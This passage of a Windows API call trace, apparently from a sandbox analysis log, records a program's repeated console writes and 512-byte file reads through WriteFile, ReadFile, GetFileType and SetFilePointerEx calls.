[0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.861] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] GetFileType (hFile=0x50) returned 0x1 [0149.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] GetFileType (hFile=0x50) returned 0x1 [0149.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.863] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] GetFileType (hFile=0x50) returned 0x1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] GetFileType (hFile=0x50) returned 0x1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.863] GetFileType (hFile=0x50) returned 0x1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] GetFileType (hFile=0x50) returned 0x1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.924] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.934] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.934] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.934] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.935] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] GetFileType (hFile=0x50) returned 0x1 [0149.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.936] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.936] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.936] GetFileType (hFile=0x50) returned 0x1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 